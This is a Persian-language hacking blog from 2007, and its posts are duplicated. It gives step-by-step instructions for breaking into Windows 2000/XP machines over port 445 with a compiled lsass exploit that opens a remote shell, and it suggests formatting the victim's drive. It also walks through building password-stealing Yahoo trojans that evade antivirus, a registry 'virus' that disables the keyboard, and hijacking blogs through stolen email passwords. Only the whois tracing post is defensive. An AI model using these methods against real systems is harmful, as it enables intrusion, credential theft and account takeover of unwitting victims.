Saturday 03 March 2007, 23:00
Saturday 03 March 2007, 23:01
هک کردن بصورت حرفه ای بدونه فرستادن فایل و هیچ برنامه ای
مطلبي كه در اينجا ميخوانيد يكمي پيچيده است بنابراين اصلا نگران نباشيد گام به گام با اين متن پيش برويد سعي ميكنم خيلي ساده عنوان كنم اصلا نگران نباشيد
خلاصه كاري كه ما ميكنيم اين است كه ما با كارهاي زير ميخواهيم به ويندوز 2000 يا ايكس پي حمله كنيم از بيرون دستگاه بدون اينكه به قرباني فايلي بديم اجرا كنهيا هر ارتباط ديگري با قرباني داشته باشيم يعني ميخوايم خيلي حرفه اي نه مثل اين هكر هاي تازه كار كه تروجان ميدن به مردم خيلي حرفه اي خودمان ميخوايم يك پورت روي دستگاه قرباني باز كنيم بدون اينكه حتي يك كلمه هم با قرباني حرف بزنيم خوب حالا كه فهميديد چيكار ميخوام بكنيم من يكبار ديگه هم خلاصه بگم يك اي پي انتخاب ميكنيد و بعد هكش ميكنيد اولين كاري كه ميكنيم اين است كه اي پي مورد نظر يا همان قرباني را براي باز بودن پورت 445 امتحان ميكنيم
Start->run->CMD
را براي باز كردن يك صفحه كامند پرومت بزنيد و بعد با دستور
telnet ip 445
امتحان ميكنيم كه ايا پورت 445 باز است يا نه البته شما اگر حرفه اي هستيد حتما مثل هكر هاي حرفه اي براي اين كارها يك برنامه خاص را استفاده ميكني بنا به سليقه خودتان كه از چه برنامه اي خوشتان مياد ولي در اينجا از دستوراتي استفاده ميكنيم كه هر كسي خواست اين كار را انجام بدهد نياز به برنامه خاصي نداشته باشه و با كمترين امكانات ميخوايم به نتيجه برسيم
خوب توجه كنيد به جا اي پي در دستور بالا بايد اي پي قرباني را وارد كنيد و اگر اين دستور را وارد كرديد و اتصال برقرار شد يعني پورت 445 باز است پس گام اول را برداشتيد و اگر اتصال برقرار نشد و پيغام خطا دريافت كرديد قرباني شما به اين نوع حمله نفوذ پذير نيست
خوب حالا به گام دوم ميرويم در زير كد هاي حمله به اين پورت را مشاهده ميكنيد اين كدها را بايد كامپايل بفرمائيد و فايل اجرايي كه بدست مي اوريد را بصورت زير استفاده ميكنيد
expl [options]
در خط بالا طرز استفاده به اين ترتيب است اولين كلمه expl نام فايل اجرايي است كه بعد از كامپايل ايجاد كرديد target يك عدد يك رقمي است كه مقدار 0 براي ويندوز ايكس پي است و مقدار 1و2 براي ويندوز 2000 است در اخر اين نوشته طرز تشخيص اينكه كدام عدد را استفاده كنيد يعني از كجا بفهميد قرباني ويندوز ايكس پي است كه 0 بزنيد يا قرباني ويندوز 2000 است كه 1 يا 2 بزنيد را ميخوانيد
victim ip همان اي پي قرباني شما است كه پورت 445 ان باز بود
binport شماره پورتي است كه ميخواهيد روي دستگاه قرباني براي شما باز بشود و به ان پورت وصل بشويد و قرباني را هك كنيد
option يك دستور است كه در ادامه تك دستور اين برنامه را توضيح ميدهم
خوب دوست من كار بسيار ساده است فرض كنيد اي پي قرباني من 217.0.0.1 است و من طبق ان چيزهايي كه بالا گفتم اين كارهاي را به تريتب انجام ميدهدم
11- دوست من در اين جا شما هر دستوري بزنيد روي دستگاه قرباني اجرا ميشود مثل اگر بزنيد format C: مي توانيد هارد قرباني را فرمت كنيد
ولي توجه كنيد يك هكر در اوج قدرت دست به خرابكاري نميزنه !!! پس هر كاري خواستيد بكنيد ولي خرابكاري نه !!!
و اما چطوري تشخيص بدهيد كه دستگاه قرباني شما ويندوز 2000 است كه از عدد 1 يا 2 استفاده كنيد يا ويندوز ايكس پي هست كه از عدد0 استفاده كنيد ؟ شما كافي است كه همان دستور بالا را كه براي حمله استفاده مكنيد بزنيد و فقط به اخرش -t اضافه كنيد يعني اينطوري
expl 0 217.0.0.1 24745 -t
بعد از زدن اين دستور برنامه به شما نسخه ويندوز را اعلام ميكند اگر نسخه ويندوز را winnt 5.0اعلام كرد يعني ويندوز 2000 است و شما عدد 1 يا 2 استفاده كنيد و اگر winnt 5.1 را اعلام كرد ويندوز ايكس پي است
مطلبي كه در اينجا ميخوانيد يكمي پيچيده است بنابراين اصلا نگران نباشيد گام به گام با اين متن پيش برويد سعي ميكنم خيلي ساده عنوان كنم اصلا نگران نباشيد
خلاصه كاري كه ما ميكنيم اين است كه ما با كارهاي زير ميخواهيم به ويندوز 2000 يا ايكس پي حمله كنيم از بيرون دستگاه بدون اينكه به قرباني فايلي بديم اجرا كنهيا هر ارتباط ديگري با قرباني داشته باشيم يعني ميخوايم خيلي حرفه اي نه مثل اين هكر هاي تازه كار كه تروجان ميدن به مردم خيلي حرفه اي خودمان ميخوايم يك پورت روي دستگاه قرباني باز كنيم بدون اينكه حتي يك كلمه هم با قرباني حرف بزنيم خوب حالا كه فهميديد چيكار ميخوام بكنيم من يكبار ديگه هم خلاصه بگم يك اي پي انتخاب ميكنيد و بعد هكش ميكنيد اولين كاري كه ميكنيم اين است كه اي پي مورد نظر يا همان قرباني را براي باز بودن پورت 445 امتحان ميكنيم
Start->run->CMD
را براي باز كردن يك صفحه كامند پرومت بزنيد و بعد با دستور
telnet ip 445
امتحان ميكنيم كه ايا پورت 445 باز است يا نه البته شما اگر حرفه اي هستيد حتما مثل هكر هاي حرفه اي براي اين كارها يك برنامه خاص را استفاده ميكني بنا به سليقه خودتان كه از چه برنامه اي خوشتان مياد ولي در اينجا از دستوراتي استفاده ميكنيم كه هر كسي خواست اين كار را انجام بدهد نياز به برنامه خاصي نداشته باشه و با كمترين امكانات ميخوايم به نتيجه برسيم
خوب توجه كنيد به جا اي پي در دستور بالا بايد اي پي قرباني را وارد كنيد و اگر اين دستور را وارد كرديد و اتصال برقرار شد يعني پورت 445 باز است پس گام اول را برداشتيد و اگر اتصال برقرار نشد و پيغام خطا دريافت كرديد قرباني شما به اين نوع حمله نفوذ پذير نيست
خوب حالا به گام دوم ميرويم در زير كد هاي حمله به اين پورت را مشاهده ميكنيد اين كدها را بايد كامپايل بفرمائيد و فايل اجرايي كه بدست مي اوريد را بصورت زير استفاده ميكنيد
expl [options]
در خط بالا طرز استفاده به اين ترتيب است اولين كلمه expl نام فايل اجرايي است كه بعد از كامپايل ايجاد كرديد target يك عدد يك رقمي است كه مقدار 0 براي ويندوز ايكس پي است و مقدار 1و2 براي ويندوز 2000 است در اخر اين نوشته طرز تشخيص اينكه كدام عدد را استفاده كنيد يعني از كجا بفهميد قرباني ويندوز ايكس پي است كه 0 بزنيد يا قرباني ويندوز 2000 است كه 1 يا 2 بزنيد را ميخوانيد
victim ip همان اي پي قرباني شما است كه پورت 445 ان باز بود
binport شماره پورتي است كه ميخواهيد روي دستگاه قرباني براي شما باز بشود و به ان پورت وصل بشويد و قرباني را هك كنيد
option يك دستور است كه در ادامه تك دستور اين برنامه را توضيح ميدهم
خوب دوست من كار بسيار ساده است فرض كنيد اي پي قرباني من 217.0.0.1 است و من طبق ان چيزهايي كه بالا گفتم اين كارهاي را به تريتب انجام ميدهدم
کد:
- Start --> Run --> CMD
2- Telnet 217.0.0.1 445
3- اگر وصل شد از برنامه حمله كه قبلا كامپال كردم و الان اماده استفاده است استفاده ميكنم
4- پنجره قبلي را كه در 2 دستور قبل باز كردم ميبندم
5- Start->Run->CMD
6-expl.exe 0 217.0.0.1 24745
----بعد از اينكه دستور خط 6 را زدنيد اين نوشته ها را مشاهده ميكنيد----
*
[*] Target: IP: 217.0.0.1: OS: winXP [universal] lsass.exe
*
[*] Connecting to 217.0.0.1:445 ... OK
*
[*] Attacking ... OK
7-حمله انجام شد و پورت مورد نظر شما كه در خط شماره 6 من شماره پورت 24745 را انتخاب كردم الان باز شده تا ما وارد دستگاه قرباني بشويم
8-Start-->Run-->CMD
9-telnet 217.0.0.1 24745
10-به احتمال 95 درصد شما موفق شديد دستگاه قرباني را هك كنيد و اين خطوط را مشاهده خواهيد كرد
* Microsoft Windows XP [Version 5.00.2600]
* © Copyright 1985-2001 Microsoft Corp.
*
* C:\WINNT\system32>11- دوست من در اين جا شما هر دستوري بزنيد روي دستگاه قرباني اجرا ميشود مثل اگر بزنيد format C: مي توانيد هارد قرباني را فرمت كنيد
ولي توجه كنيد يك هكر در اوج قدرت دست به خرابكاري نميزنه !!! پس هر كاري خواستيد بكنيد ولي خرابكاري نه !!!
و اما چطوري تشخيص بدهيد كه دستگاه قرباني شما ويندوز 2000 است كه از عدد 1 يا 2 استفاده كنيد يا ويندوز ايكس پي هست كه از عدد0 استفاده كنيد ؟ شما كافي است كه همان دستور بالا را كه براي حمله استفاده مكنيد بزنيد و فقط به اخرش -t اضافه كنيد يعني اينطوري
expl 0 217.0.0.1 24745 -t
بعد از زدن اين دستور برنامه به شما نسخه ويندوز را اعلام ميكند اگر نسخه ويندوز را winnt 5.0اعلام كرد يعني ويندوز 2000 است و شما عدد 1 يا 2 استفاده كنيد و اگر winnt 5.1 را اعلام كرد ويندوز ايكس پي است
Saturday 03 March 2007, 23:01
بدست اوردن پسورد ایدی یاهو بوسیله تروجان
شما به وسیله این تروجان میتوانید به راحتی pass ایدی طرف رو بدست بیارید این نسخه از این نرم افزار در مقابل نسخه های دیگرش بسیار پیشرفته تره روی 0.7 yahoo massenger کار میکنه و قابليت هاي جديد مثل ارسال (user,pass,number) كارت اينترنت dial up password. این نرم افزار تمامی اطلاعات رو به صورت pm در ایدی خودتون میزاره.
خوب من اموزش کامل استفاده از این نرم افزار رو اینجا میدم.
وقتی نرم افزار رو از زیر دانلود کردید و اونو نصب کردید تو قسمت :
in vicyim System:این قسمت رو تغییر ندید بهتر.
Fake Error massage:این قسمت برای ساختن پیام خطای مجازی یعنی وقتی فایلی رو که درست کردید رو برای قربانی فرستادید و قربانی فایل رو باز میکنه یه پیام خطا براش میاد. که شما باید این قسمت رو تیک بزنید.
send to My yahoo!ID:در این قسمت ایدی خودتونو مینویسید تا پسورد ایدی هک شده به این ایدی send بشه توجه کنید فقط ایدی مثلا ali_2006 و نوشتن کامل ایدی غلط.
choose icon:ای قسمت هم jpg icon رو تیک بزنید.
حالا روی make server کلیک کنید
حالا فایل رو برای دوستتون یا همون کسی که میخواین هکش کنید Send کنید.
وقتی شخص قربانی فایل رو باز کنه در جا یه pm به ایدی شما میاد که حاوی اطلاعات از قبیل پسورد ایدی هک شدست.
موفق باشید. براي دريافت iRcHaTaN Ps 7.1 اينجا كليك كنيد
شما به وسیله این تروجان میتوانید به راحتی pass ایدی طرف رو بدست بیارید این نسخه از این نرم افزار در مقابل نسخه های دیگرش بسیار پیشرفته تره روی 0.7 yahoo massenger کار میکنه و قابليت هاي جديد مثل ارسال (user,pass,number) كارت اينترنت dial up password. این نرم افزار تمامی اطلاعات رو به صورت pm در ایدی خودتون میزاره.
خوب من اموزش کامل استفاده از این نرم افزار رو اینجا میدم.
وقتی نرم افزار رو از زیر دانلود کردید و اونو نصب کردید تو قسمت :
in vicyim System:این قسمت رو تغییر ندید بهتر.
Fake Error massage:این قسمت برای ساختن پیام خطای مجازی یعنی وقتی فایلی رو که درست کردید رو برای قربانی فرستادید و قربانی فایل رو باز میکنه یه پیام خطا براش میاد. که شما باید این قسمت رو تیک بزنید.
send to My yahoo!ID:در این قسمت ایدی خودتونو مینویسید تا پسورد ایدی هک شده به این ایدی send بشه توجه کنید فقط ایدی مثلا ali_2006 و نوشتن کامل ایدی غلط.
choose icon:ای قسمت هم jpg icon رو تیک بزنید.
حالا روی make server کلیک کنید
حالا فایل رو برای دوستتون یا همون کسی که میخواین هکش کنید Send کنید.
وقتی شخص قربانی فایل رو باز کنه در جا یه pm به ایدی شما میاد که حاوی اطلاعات از قبیل پسورد ایدی هک شدست.
موفق باشید. براي دريافت iRcHaTaN Ps 7.1 اينجا كليك كنيد
Saturday 03 March 2007, 23:02
پسورد....هک ایدی
یک برنامه خوب برای هک ایدی ومشخصات کامل ویندوز طرف
این برنامه یکی از جدید ترین برنامه در زمینه هک ایدی که ۲ روز ساخته شده و این جدید ترین وژنشه وهیچ انتی ویروسی حتی norton 2005 که قوی ترین انتی ویروس جهان است اونو نمیشناسه و ایکنش هم شبیه ایکنهای ویندوز اکس پی که دیگه کسی شک نکنه.
شما با استفاده از این نرم افزار بسیار قوی میتوانید ایدی طرف رو هک ومشخصات کامل ویندوز طرف رو بدست بیارید مزیت این نرم افزار نصبت به نرم افزار قبل اینه که قربانی به هیچ وجه نمیتونه اونو از سیستم خودش پاک کنه حتی اگر ویندوزشو عوض کنه بازم برنامه پاک نمیشه و هیچ انتی ویروسی اونو نمیشناسه.
اموزش کامل برنامه:
در قسمت ۱ ادرس ایمیل خود وارد کنید
در قسمت ۲ مانند شکل بالاعمل کنید
در قسمت ۳ از گزینه open میتوانید شکل ایکون را انتخاب کنید
در قسمت ۴ پسوند فایل را انتخاب کنید
و در اخر روی گزینه Build کیلیک کنید فایل شما در پوشه برنامه ساخته میشود .
حال برنامه را به قربانی Send میکنیماگر شخص مقابل روی فایل ارسالی از طرف شما کلیک
کند پسورد و.. برای ایمیل شما ارسال میشود.
موفق باشید . براي دريافت Y!Jacked اينجا كليك كنيد
یک برنامه خوب برای هک ایدی ومشخصات کامل ویندوز طرف
این برنامه یکی از جدید ترین برنامه در زمینه هک ایدی که ۲ روز ساخته شده و این جدید ترین وژنشه وهیچ انتی ویروسی حتی norton 2005 که قوی ترین انتی ویروس جهان است اونو نمیشناسه و ایکنش هم شبیه ایکنهای ویندوز اکس پی که دیگه کسی شک نکنه.
شما با استفاده از این نرم افزار بسیار قوی میتوانید ایدی طرف رو هک ومشخصات کامل ویندوز طرف رو بدست بیارید مزیت این نرم افزار نصبت به نرم افزار قبل اینه که قربانی به هیچ وجه نمیتونه اونو از سیستم خودش پاک کنه حتی اگر ویندوزشو عوض کنه بازم برنامه پاک نمیشه و هیچ انتی ویروسی اونو نمیشناسه.
اموزش کامل برنامه:
در قسمت ۱ ادرس ایمیل خود وارد کنید
در قسمت ۲ مانند شکل بالاعمل کنید
در قسمت ۳ از گزینه open میتوانید شکل ایکون را انتخاب کنید
در قسمت ۴ پسوند فایل را انتخاب کنید
و در اخر روی گزینه Build کیلیک کنید فایل شما در پوشه برنامه ساخته میشود .
حال برنامه را به قربانی Send میکنیماگر شخص مقابل روی فایل ارسالی از طرف شما کلیک
کند پسورد و.. برای ایمیل شما ارسال میشود.
موفق باشید . براي دريافت Y!Jacked اينجا كليك كنيد
Saturday 03 March 2007, 23:02
خوب میخواهیم بفهمیم یک اکسپلویت با چی نوشته شده است
پرل : باید در اول خط این گزینه باشد
/usr/bin/perl
نکته : اکسپلویتهای پرل نیاز به کامپایل ندارند و فقط باید نرم افزار پرل را داشته باشید
اسم نرم افزار Activeperl هست که میتونید در گوگل سرچ کنید و آن را دانلود کنید
C++ = اگر در اکسپلویت این گزینه های به کار رفته باشد با سی++ نوشته شده است
#include
#include
#include
#include
که گزینه آخر نشان دهنده این است که این اکسپلویت تحت وین است
نکته : نباید تمام این گزینه ها باشد اگرفقط در آنها کلمه#include به کار رفته باشد سی++ است
پرل : باید در اول خط این گزینه باشد
/usr/bin/perl
نکته : اکسپلویتهای پرل نیاز به کامپایل ندارند و فقط باید نرم افزار پرل را داشته باشید
اسم نرم افزار Activeperl هست که میتونید در گوگل سرچ کنید و آن را دانلود کنید
C++ = اگر در اکسپلویت این گزینه های به کار رفته باشد با سی++ نوشته شده است
#include
#include
#include
#include
که گزینه آخر نشان دهنده این است که این اکسپلویت تحت وین است
نکته : نباید تمام این گزینه ها باشد اگرفقط در آنها کلمه#include به کار رفته باشد سی++ است
Saturday 03 March 2007, 23:03
ساخت ويروس Flicker
امروز شما با ويروس Flicker آشنا ميشويد. البته شايد بعضي از شما آن را بشناسيد چون برنامه نسبتا معروفي است كه بيشتر براي شوخي كردن از آن استفاده ميشود. البته flicker بيشتر شباهت به يك برنامه اعصاب خوردكن دارد تا يك ويروس.FLICKER در معني به معناي چشمك زن و سوسو زدن است و دليل اين نامگذاري اين است كه اين به اصطلاح ويروس كاري ميكند كه كاربر هرگاه دكمه اي از كيبرد را فشار دهد يك صداي بوغ كه به آن اصطلاحا Beep گفته مشود از كامپيوتر شنيده ميشود و هم زمان با اين صدا صفحه مانيتور يكبار بطور سريع چشمك ميزند. و با اين وضع عملا كار با كيبرد امكانپذير نيست. اين ويروس از آن دسته است كه به كمك رجيستري كار ميكند.
خب حالا ميرسيم به شروع كار:
Notepad را باز كنيد و عبارت زير را در آن وارد كنيد
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]
"Flags"="127"
[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]
"Flags"="3"
"WindowsEffect"="3"
سپس آن را با پسوند Reg و با نامي مثل FlickerON.Reg سيو كنيد.
حال يك فايل Notepad ديگر باز كنيد و عبارت زير را به منظور غيرفعال كردن ويروستان در آن وارد كنيد:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]
"Flags"="126"
[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]
"Flags"="2"
"WindowsEffect"="0"
و آن را هم به همان روش بالا ولي اين بار با نامي مثل FlickerOff.Reg سيو كنيد. حال شما دو فايل رجيستري ساختيد كه با كليك كردن روي هركدام از آنها از شما اجازه گرفته و درون رجيستري Import ميشوند. حال براي امتحان روي FlickerOn كليك كنيد و وقتي Import شد كامپيوتر خود را Restart كنيد تا نحوه كارش را ببينيد. واضح است كه براي غير فعال كردن بايد همين كارها را با FlickerOff انجام دهيد با اين تفاوت كه شما در آن موقع فقط ميتوانيد از Mouse استفاده كنيد چون كيبرد شما كماكان غير قابل استفاده است!!!!!. لازم به ذكر است كه همه ويروسها مثل Flicker مستقيما به كمك رجيستري عمل نميكنند و روشهاي مختلفي براي كار دارند
اگه كسي مي خواهى طرز ساخت ويروس blaster را بدونه اعلام كنه تا مطلبي هم در اين مورد در اختيار شما عزيزان قرار بدم
اميدوارم مطلب امروز مورد توجه شما قرار گرفته باش
امروز شما با ويروس Flicker آشنا ميشويد. البته شايد بعضي از شما آن را بشناسيد چون برنامه نسبتا معروفي است كه بيشتر براي شوخي كردن از آن استفاده ميشود. البته flicker بيشتر شباهت به يك برنامه اعصاب خوردكن دارد تا يك ويروس.FLICKER در معني به معناي چشمك زن و سوسو زدن است و دليل اين نامگذاري اين است كه اين به اصطلاح ويروس كاري ميكند كه كاربر هرگاه دكمه اي از كيبرد را فشار دهد يك صداي بوغ كه به آن اصطلاحا Beep گفته مشود از كامپيوتر شنيده ميشود و هم زمان با اين صدا صفحه مانيتور يكبار بطور سريع چشمك ميزند. و با اين وضع عملا كار با كيبرد امكانپذير نيست. اين ويروس از آن دسته است كه به كمك رجيستري كار ميكند.
خب حالا ميرسيم به شروع كار:
Notepad را باز كنيد و عبارت زير را در آن وارد كنيد
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]
"Flags"="127"
[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]
"Flags"="3"
"WindowsEffect"="3"
سپس آن را با پسوند Reg و با نامي مثل FlickerON.Reg سيو كنيد.
حال يك فايل Notepad ديگر باز كنيد و عبارت زير را به منظور غيرفعال كردن ويروستان در آن وارد كنيد:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]
"Flags"="126"
[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]
"Flags"="2"
"WindowsEffect"="0"
و آن را هم به همان روش بالا ولي اين بار با نامي مثل FlickerOff.Reg سيو كنيد. حال شما دو فايل رجيستري ساختيد كه با كليك كردن روي هركدام از آنها از شما اجازه گرفته و درون رجيستري Import ميشوند. حال براي امتحان روي FlickerOn كليك كنيد و وقتي Import شد كامپيوتر خود را Restart كنيد تا نحوه كارش را ببينيد. واضح است كه براي غير فعال كردن بايد همين كارها را با FlickerOff انجام دهيد با اين تفاوت كه شما در آن موقع فقط ميتوانيد از Mouse استفاده كنيد چون كيبرد شما كماكان غير قابل استفاده است!!!!!. لازم به ذكر است كه همه ويروسها مثل Flicker مستقيما به كمك رجيستري عمل نميكنند و روشهاي مختلفي براي كار دارند
اگه كسي مي خواهى طرز ساخت ويروس blaster را بدونه اعلام كنه تا مطلبي هم در اين مورد در اختيار شما عزيزان قرار بدم
اميدوارم مطلب امروز مورد توجه شما قرار گرفته باش
Saturday 03 March 2007, 23:04
نحوه شناسايي Isp ي كه از طريق آن هكر به اينترنت متصل است گر zonealarm را نصب كرده باشيد ، حتما متوجه شده ايد كه بعد از هر attack كه از طرف هكر به كامپيوتر شما انجام مي شود ، اين برنامه IP Address شخص حمله كننده را در اختيار شما قرار مي دهد. در اين هفته قصد دارم نحوه شناسايي ISP ي كه از طريق آن هكر به اينترنت متصل است را شرح دهم. پس از اينكه IP هكر را از طريق برنامه zonealarm و يا هر برنامه ديگري بدست آورديد به آدرس زير برويد كه يك Whois ساده است.
در بالاي صفحه box خالي اي وجود دارد و در كنار آن دكمه submit query وجود دارد. IP
را در box نوشته و بر روي دكمه كليك كنيد. نتيجه اي كه پس از چند ثانيه خواهيد ديد ، چيري شبيه به اين است :
اين IP فقط يك مثال است.... xxxxxonline.net ISP فرضی است که بدلیل حفظ بعضی مسائل خودم اونرو سانسور كردم ..!!! در اين نتيجه شما مي توانيد به راحتي نام ISP و Email شخصي كه اين IP Range در اختيار اوست را مشاهده نماييد. اگر با جوابي مانند EU-ZZ-XXXX برخورد نموديد ، به آدرسهاي زير برويد و آنجا سعي در يافتن ISP هكر خود نماييد. از اينجا به بعد شما كاري نمي توانيد انجام دهيد. فقط مي توانيد با ISP يا آدرس Email ي كه مشاهده مي كنيد ، تماس بگيريد و تاريخ و زمان و IP هكر را بدهيد و از آنها درخواست نماييد با اين كاربر خطاكار برخورد نمايند. ولي متاسفانه از آنجايي كه هيچ قانون مدوني در مورد جرايم الكترونيكي وجود ندارد ، و نيز معمولا ISP ها به علت داشتن تعداد كاربران زياد اطلاعات كاملي از IP هايي كه در زمانهاي مشخص در اختيار كاربران گذاشته اند ندارند ، عملا كاري از شما بر نمي آيد. تنها ISP ي كه در اين زمينه من را كمك كرد شركت .......... بود !!!!! كه آن زمان تازه تاسيس شده بود و خلوت بود. در جواب نامه ام آمده بود كه با تشكر از تذكر شما ، IP ي كه به ما داده بوديد در زمان و تاريخ ذكر شده به كاربري تعلق داشت كه دسترسي او را قطع كرديم. به غير از اين يك مورد ما بقي ISP ها يا اصلا جوابي به نامه هايم ندادند و يا اظهار كردند كه كاري از دستشان بر نمي آيد. در نظر داشته باشيد كه گاهي مواقع ZoneAlarm دستورهاي Ping و يا Routing را نيز به عنوان Attack معرفي مي كند. يا حتي احتمال دارد به صورت اتفاقي يك كاربر IP Sniffing انجام دهد بدون قصد هك كردن ولي ZoneAlarm همه را به عنوان Attack معرفي مي نمايد. پس پيشنهاد مي كنم اگر از يك IP بارها به شما Attack شد ، آنوقت سعي در يافتن هكر نمايي
در بالاي صفحه box خالي اي وجود دارد و در كنار آن دكمه submit query وجود دارد. IP
را در box نوشته و بر روي دكمه كليك كنيد. نتيجه اي كه پس از چند ثانيه خواهيد ديد ، چيري شبيه به اين است :
کد:
% This is the RIPE Whois server. % The objects are in RPSL format. % Please visit http://www.\****.net/perl/whois (http://www.\****.net/perl/whois) for more information. % Rights restricted by copyright. % See http://www.****.net/ripencc/pub-ser.../copyright.html (http://www.****.net/ripencc/pub-ser.../copyright.html) inetnum: 213.217.40.0 - 213.217.43.255 netname: parsonline descr: parsonline corp. descr: Internet Service Provide country: IR admin-c: AF1351 tech-c: HOP1972 tech-c: SHP76-RIPE status: ASSIGNED PA notify: shirinp@xxxxxonline.net (shirinp@xxxxxonline.net) mnt-by: RIPE-NCC-NONE-MNT changed: hooman@xxxxxonline.net (hooman@xxxxxonline.net)20010818 source: RIPE route: 213.217.40.0/22 descr: ParsOnline Co. descr: Announced by SMS for ParsOnline Co. origin: AS13126 notify: networks@sms-internet.net (networks@sms-internet.net) notify: afateh@xxxxxonline.net (afateh@xxxxxonline.net) mnt-by: AS13126-MNT changed: darren.frowen@sms-internet.net (darren.frowen@sms-internet.net) 20020409 source: RIPE person: Abdollah Fateh address: Pars Online Co. address: 224 Khoramshahr ave., No. 6C address: Tehran 15337 address: Iran phone: +98 21 875 7277 fax-no: +98 21 874 9595 e-mail: afateh@xxxxxonline.net (afateh@xxxxxonline.net) nic-hdl: AF1351 changed: afateh@xxxxxonline.net (afateh@xxxxxonline.net)20000628 changed: afateh@xxxxxonline.net (afateh@xxxxxonline.net)20020130 source: RIPE person: Hooman Parta address: Pars Online Co. address: 224 Khoramshahr Ave., #6C address: Tehran 15337 address: Iran phone: +98 21 875 7277 fax-no: +98 21 874 9595 e-mail: hooman@xxxxxonline.net (hooman@xxxxxonline.net) nic-hdl: HOP1972 changed: hooman@xxxxxonline.net (hooman@xxxxxonline.net)20000629 source: RIPE person: Shirin Pourkashani address: Pars Online Co. address: 224 Khoramshahr Ave., #6C address: Tehran 15337 address: Iran phone: +98 21 875 7277 fax-no: +98 21 874 9595 e-mail: shirinp@xxxxxonline.net (shirinp@xxxxxonline.net) nic-hdl: SHP76-RIPE changed: (shirinp@xxxxxonline.net)20010410 source: RIPEاين IP فقط يك مثال است.... xxxxxonline.net ISP فرضی است که بدلیل حفظ بعضی مسائل خودم اونرو سانسور كردم ..!!! در اين نتيجه شما مي توانيد به راحتي نام ISP و Email شخصي كه اين IP Range در اختيار اوست را مشاهده نماييد. اگر با جوابي مانند EU-ZZ-XXXX برخورد نموديد ، به آدرسهاي زير برويد و آنجا سعي در يافتن ISP هكر خود نماييد. از اينجا به بعد شما كاري نمي توانيد انجام دهيد. فقط مي توانيد با ISP يا آدرس Email ي كه مشاهده مي كنيد ، تماس بگيريد و تاريخ و زمان و IP هكر را بدهيد و از آنها درخواست نماييد با اين كاربر خطاكار برخورد نمايند. ولي متاسفانه از آنجايي كه هيچ قانون مدوني در مورد جرايم الكترونيكي وجود ندارد ، و نيز معمولا ISP ها به علت داشتن تعداد كاربران زياد اطلاعات كاملي از IP هايي كه در زمانهاي مشخص در اختيار كاربران گذاشته اند ندارند ، عملا كاري از شما بر نمي آيد. تنها ISP ي كه در اين زمينه من را كمك كرد شركت .......... بود !!!!! كه آن زمان تازه تاسيس شده بود و خلوت بود. در جواب نامه ام آمده بود كه با تشكر از تذكر شما ، IP ي كه به ما داده بوديد در زمان و تاريخ ذكر شده به كاربري تعلق داشت كه دسترسي او را قطع كرديم. به غير از اين يك مورد ما بقي ISP ها يا اصلا جوابي به نامه هايم ندادند و يا اظهار كردند كه كاري از دستشان بر نمي آيد. در نظر داشته باشيد كه گاهي مواقع ZoneAlarm دستورهاي Ping و يا Routing را نيز به عنوان Attack معرفي مي كند. يا حتي احتمال دارد به صورت اتفاقي يك كاربر IP Sniffing انجام دهد بدون قصد هك كردن ولي ZoneAlarm همه را به عنوان Attack معرفي مي نمايد. پس پيشنهاد مي كنم اگر از يك IP بارها به شما Attack شد ، آنوقت سعي در يافتن هكر نمايي
Saturday 03 March 2007, 23:06
هک وبلاگ
شما اول از همه باید یه وبلاگی رو واسه خودتون هدف قرار بدید حالا که وبلاگ مشخص شد شما باید ایمیل طرف رو بیابید برا اینکار میری تو وبلاگ و در قسمت پست الکترونیک یا هر چیز مربوط به ایمیل دیگری رو در وبلاگ پیدا میکنید حال که روش کلیک کنید ایمیل طرف رو براتون میآره . دوستان توجه کنید اگه طرف ایمیل تو وبلاگش نداشته باشه این روش کار نمیده. خب حالا فرض کنیم که طرف ایمیل داره که 90% وبلاگ نویسان تو وبلاگشون ایمیل خودشونو میزارن حالا که فهمیدیم ایمیلش چیه باید به وسیله یک برنامه مانند behzad ps از اینجا یا smart ps یا هر برنامه جدید دیگری پاسورد ایمیل اون طرفو در بیاریم یعنی اینکه برنامه رو بعد از ساختن برا همون ایمیلش سند کنید تا طرف اجراش کنه و پاسورد ایمیلش که دیگه آخر کاره براتون فرستاده بشه تا اینجا شما آدرس وبلاگ قربانی . آدرس ایمیل قربانی . و پاسورد ایمیل قربانی رو دارید دیگه آفتاب لب بومه شما به راحتی میتونید وبلاگ رو هک کنید میگید چطور؟ حالا میگم . ما فرض بر این داریم که وبلاگی که میخوایم هکش کنیم از بلاگفا میباشد حال به سایت بلاگفا میریم و بر روی (کلمه عبور خود را فراموش کرده ام) کلیک کنید یه صحفه براتون باز میشه که 2 باکس داره شما در اولی آدرس وبلاگو بدید و در باکس دومی ایمیل طرف رو بدید حالا دکمه رو بزنید به همین راحتی پاسورد وبلاگ برا اون ایمیلی که هک کردین میآد و شما با ورود به اون ایمیل میتونید پاسورد رو خونده و حالا به وبلاگ لاگین کنید و هر کاری دوست داشتید بکنید
شما اول از همه باید یه وبلاگی رو واسه خودتون هدف قرار بدید حالا که وبلاگ مشخص شد شما باید ایمیل طرف رو بیابید برا اینکار میری تو وبلاگ و در قسمت پست الکترونیک یا هر چیز مربوط به ایمیل دیگری رو در وبلاگ پیدا میکنید حال که روش کلیک کنید ایمیل طرف رو براتون میآره . دوستان توجه کنید اگه طرف ایمیل تو وبلاگش نداشته باشه این روش کار نمیده. خب حالا فرض کنیم که طرف ایمیل داره که 90% وبلاگ نویسان تو وبلاگشون ایمیل خودشونو میزارن حالا که فهمیدیم ایمیلش چیه باید به وسیله یک برنامه مانند behzad ps از اینجا یا smart ps یا هر برنامه جدید دیگری پاسورد ایمیل اون طرفو در بیاریم یعنی اینکه برنامه رو بعد از ساختن برا همون ایمیلش سند کنید تا طرف اجراش کنه و پاسورد ایمیلش که دیگه آخر کاره براتون فرستاده بشه تا اینجا شما آدرس وبلاگ قربانی . آدرس ایمیل قربانی . و پاسورد ایمیل قربانی رو دارید دیگه آفتاب لب بومه شما به راحتی میتونید وبلاگ رو هک کنید میگید 